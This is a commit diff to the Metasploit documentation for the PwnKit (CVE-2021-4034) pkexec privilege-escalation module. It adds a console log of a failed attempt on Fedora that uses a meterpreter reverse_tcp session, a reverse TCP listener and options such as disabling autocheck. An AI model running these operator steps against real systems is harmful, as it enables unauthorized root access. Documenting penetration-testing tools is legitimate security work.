adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add Fedora results to docs and some minor final cleanup

Browse Source
This commit is contained in:
bwatters
2022-03-02 09:12:01 -06:00
parent 58aed837b2
commit 06e897436c
4 changed files with 73 additions and 11 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.md
+67 -5
View File
@@ -1,7 +1,7 @@
## Vulnerable Application
The `check` method uses the exploit without a payload. The patched version
will exit without any arguments and give the help menu. Unpatched versiions
will exit without any arguments and give the help menu. Unpatched versions
give the error that the shell was not in the shells folder.
Last Vulnerable Ubuntu packages:
@@ -60,8 +60,70 @@ Source: https://www.ramanean.com/script-to-detect-polkit-vulnerability-in-redhat
### Fedora:
Fedora should be vulnerable, and the check will return showing that it is vulnerable, but
the exploit will fail. I don't know why.
Fedora should be vulnerable, and the pkexec binary will respond like it is vulnerable, but
the exploit will fail. I don't know why, but it still fails with SELinux disabled or using the
original PoCs that compiled a binary on target. The check method just bails if it sees Fedora.
```
msf6 payload(linux/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Fedora 33 (Linux 5.8.15-301.fc33.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > shell
Process 2396 created.
Channel 5 created.
sestatus
SELinux status: disabled
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/x64/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set auto
set autocheck set autorunscript set autounhookprocess
set autoloadstdapi set autosysteminfo set autoverifysessiontimeout
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set autoCheck false
autoCheck => false
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > check
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_railgun_api
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.117
[*] The target is not exploitable. Fedora is not supported
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_railgun_api
[*] Started reverse TCP handler on 10.5.135.101:4444
[!] AutoCheck is disabled, proceeding with exploitation
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.wqogdpzub
[*] /tmp/.wqogdpzub created
[*] Writing '/tmp/.wqogdpzub/kfmlrhrqi/kfmlrhrqi.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.wqogdpzub
[*] Running python /tmp/.wqogdpzub/.skihoukdb /usr/bin/pkexec /tmp/.wqogdpzub/kfmlrhrqi/kfmlrhrqi.so kfmlrhrqi jdtnqzvqn
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “jdtnqzvqn”
The value for the SHELL variable was not found the /etc/shells file
This incident has been reported.
[*] Exploit completed, but no session was created.
```
### RedHat:
Untested on Redhat, but I assume similar to Fedora.
@@ -159,7 +221,7 @@ as serving as a location to store the various files and directories created by t
The default value is `/tmp`
### PKEXEC_PATH
This indicates the location of the pkexec binary. Normally, the module can find the binary without help.
This indicates the location of the `pkexec` binary. Normally, the module can find the it without help.
It defaults to nil.
## Advanced Options
@@ -168,7 +230,7 @@ It defaults to nil.
This indicates the starting directory for the new root-enabled session. The module deletes the working directory
out from under the running payload, so the current working directory for the new session will not exist, and that
can result in odd errors, so we just change to a directory that does exist before user interaction.
It defaults to '/'
It defaults to `/`
## Scenarios